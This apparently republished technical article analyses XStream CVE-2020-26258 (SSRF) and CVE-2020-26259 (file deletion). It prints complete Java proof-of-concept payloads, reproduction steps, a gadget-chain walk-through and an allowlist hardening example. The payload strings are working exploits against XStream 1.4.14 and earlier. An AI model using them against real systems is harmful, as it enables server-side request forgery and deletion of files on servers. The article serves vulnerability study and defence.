Shulou (Shulou.com) 05/31 report, SLTechnology News&Howtos > Network Security (updated 2025-03-18)
This article reproduces and analyses two XStream deserialization vulnerabilities, CVE-2020-26258 (server-side request forgery) and CVE-2020-26259 (arbitrary file deletion), explains their root cause and summarises the fix.
XStream is a Java library for serializing objects to XML (or JSON) and deserializing them back. It is open source, distributed under the BSD license.
0x01 vulnerability description
The fix for CVE-2020-26217 was incomplete. The blacklist entries added at that time stop the remote code execution gadget, but the same entry point can be combined with other JDK classes to delete files on the server and to issue server-side requests (SSRF).
Affected versions
XStream <= 1.4.14
Fixed in
XStream >= 1.4.15
Risk level
Serious
0x02 PoC

The payloads below are the ones published in the linked advisories; the CVE-2020-26258 target port is 8989 here to match the local Flask listener used in the reproduction section.

CVE-2020-26258 PoC:

import com.thoughtworks.xstream.XStream;

/*
 * CVE-2020-26258: a Server-Side Forgery Request can be activated unmarshalling
 * with XStream to access data streams from an arbitrary URL referencing a
 * resource in an intranet or the local host.
 * All versions until and including version 1.4.14.
 * https://x-stream.github.io/CVE-2020-26258.html
 *
 * With the default configuration XStream 1.4.14 only prints the warning
 * "Security framework of XStream not explicitly initialized, using predefined black list on your own risk."
 */
public class CVE_2020_26258 {
    public static void main(String[] args) {
        String ssrf_xml =
                "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='javax.activation.URLDataSource'>\n" +
                "            <url>http://localhost:8989/internal/</url>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";
        XStream xstream = new XStream();
        // Inserting the map entry calls NativeString.hashCode(), which ends in URLDataSource.getInputStream()
        xstream.fromXML(ssrf_xml);
    }
}

CVE-2020-26259 PoC:

import com.thoughtworks.xstream.XStream;

/*
 * CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host
 * when unmarshalling as long as the executing process has sufficient rights.
 * https://x-stream.github.io/CVE-2020-26259.html
 *
 * With the default configuration XStream 1.4.14 only prints the warning
 * "Security framework of XStream not explicitly initialized, using predefined black list on your own risk."
 */
public class CVE_2020_26259 {
    public static void main(String[] args) {
        String xml_poc =
                "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
                "            <contentType>text/plain</contentType>\n" +
                "            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>\n" +
                "              <tempFile>/tmp/CVE-2020-26259</tempFile>\n" +
                "            </is>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";
        XStream xstream = new XStream();
        // Same chain as above; here Base64Data.get() ends in FileStream.close(), which deletes tempFile
        xstream.fromXML(xml_poc);
    }
}

0x03 vulnerability details

Reproduction environment
Build a Maven project in IDEA with the two PoC classes above. The pom.xml (modelVersion 4.0.0, project version 1.0-SNAPSHOT) declares the vulnerable XStream release as its only dependency:

    <dependency>
        <groupId>com.thoughtworks.xstream</groupId>
        <artifactId>xstream</artifactId>
        <version>1.4.14</version>
    </dependency>

Run either class directly. The PoCs were written against a JDK 8 runtime: they instantiate JDK-internal classes (jdk.nashorn.internal.objects.NativeString, com.sun.xml.internal.*) that later JDKs encapsulate or no longer ship.
Reproduction

CVE-2020-26258: start a temporary HTTP service with Flask, listening on the port used in the PoC URL (8989), then run the PoC; the service logs the incoming request for /internal/ (screenshot omitted).

CVE-2020-26259: create the file /tmp/CVE-2020-26259, run the PoC, and check again: the file has been deleted (before/after screenshots omitted).
Vulnerability analysis

Both issues follow the same pattern as CVE-2020-26217. When XStream deserializes a Map it rebuilds the map entry by entry, and inserting an entry calls hashCode() on the freshly deserialized key; all three CVEs use jdk.nashorn.internal.objects.NativeString as that key so that its hashCode() starts the gadget chain.
Debugging and analysis

Deserialization enters through XStream.fromXML():

Stepping into MapConverter.putCurrentEntryIntoMap(): while rebuilding each entry, XStream calls put() on the target map with the key we supplied, the NativeString:

put() first computes the hash of the key:

hash() calls key.hashCode(), i.e. the hashCode() of the jdk.nashorn.internal.objects.NativeString we injected:

NativeString.hashCode() calls getStringValue(), which calls toString() on its value field, and that value is the com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data we supplied:

Base64Data.toString() calls get():

Up to this point the chain is identical to CVE-2020-26217. That CVE continued through readFrom() and the calls after it; because XStream's blacklist now blocks the remote code execution path, these two CVEs instead abuse the getInputStream() and close() calls made inside get(), for SSRF and file deletion respectively.

InputStream is = this.dataHandler.getDataSource().getInputStream(); is where the SSRF fires, through javax.activation.URLDataSource.getInputStream():

URLDataSource.getInputStream() simply opens a connection to the supplied URL:

The file deletion happens in close(): the stream supplied in the payload is a com.sun.xml.internal.ws.util.ReadAllStream$FileStream, and its close() deletes the tempFile it was given.
Fix analysis

XStream 1.4.15 fixes both issues by extending the default blacklist so that the types used by these gadgets are denied. A blacklist only covers gadgets that are already known, which is exactly how the CVE-2020-26217 fix turned into CVE-2020-26258 and CVE-2020-26259; both advisories therefore recommend configuring XStream's security framework with a whitelist of the types the application actually needs.
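The whitelist configuration the advisories recommend, as an added example that is not code from the original article or from the XStream project. It uses XStream's public security API (addPermission, allowTypes, allowTypeHierarchy, all available in 1.4.14); the Greeting class, the set of allowed types, port 8989 and the rejectsPayload helper are assumptions for the demo, and the payload string is a constructed copy of the CVE-2020-26258 gadget from above.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

import java.util.Collection;
import java.util.Map;

public class XStreamAllowlistDemo {

    /** Hypothetical application type: the only object we expect on the wire. */
    public static class Greeting {
        public String name;
        public int count;
    }

    /**
     * XStream instance that unmarshals nothing but the types listed here.
     * Every other class name, including the JDK-internal gadget classes used by
     * CVE-2020-26258/26259, is rejected before an instance is created.
     */
    public static XStream hardened() {
        XStream xstream = new XStream();
        // Deny everything first; this also drops the default blacklist, so the
        // policy no longer depends on XStream knowing a gadget in advance.
        xstream.addPermission(NoTypePermission.NONE);
        // Re-allow only what the application needs. PRIMITIVES does not cover String.
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[]{String.class, Greeting.class});
        xstream.allowTypeHierarchy(Collection.class);
        // Map is allowed on purpose: the demo shows the payload being stopped at
        // the first forbidden element inside the map, not at the <map> root.
        xstream.allowTypeHierarchy(Map.class);
        return xstream;
    }

    /** Constructed copy of the CVE-2020-26258 payload (port 8989 assumed, as in the PoC). */
    static final String SSRF_PAYLOAD =
            "<map><entry>"
          + "<jdk.nashorn.internal.objects.NativeString><flags>0</flags>"
          + "<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>"
          + "<dataHandler><dataSource class='javax.activation.URLDataSource'>"
          + "<url>http://localhost:8989/internal/</url></dataSource>"
          + "<transferFlavors/></dataHandler><dataLen>0</dataLen></value>"
          + "</jdk.nashorn.internal.objects.NativeString><string>test</string>"
          + "</entry></map>";

    /** Returns true when the instance refuses the payload because of a forbidden class. */
    public static boolean rejectsPayload(XStream xstream, String xml) {
        try {
            xstream.fromXML(xml);
            return false;
        } catch (XStreamException e) {
            // A forbidden root element surfaces as ForbiddenClassException directly;
            // a forbidden nested element is wrapped in a ConversionException, so walk the causes.
            for (Throwable t = e; t != null; t = t.getCause()) {
                if (t instanceof ForbiddenClassException) {
                    return true;
                }
            }
            throw e;
        }
    }

    public static void main(String[] args) {
        XStream safe = hardened();

        // Legitimate data still round-trips through the hardened instance.
        Greeting g = new Greeting();
        g.name = "alice";
        g.count = 3;
        Greeting back = (Greeting) safe.fromXML(safe.toXML(g));
        System.out.println("round trip: " + back.name + " x" + back.count);

        // The gadget payload is stopped at jdk.nashorn.internal.objects.NativeString:
        // no key object exists, so hashCode() and Base64Data.get() never run and
        // no request is sent to port 8989.
        System.out.println("SSRF payload rejected: " + rejectsPayload(safe, SSRF_PAYLOAD));
    }
}
```

The same instance rejects the CVE-2020-26259 payload at the same element, since the two gadgets share the NativeString key. Later XStream releases (1.4.18 and up) stopped relying on the blacklist by default, but an explicit whitelist like the one above works on 1.4.14 as well and keeps the policy independent of the library's defaults.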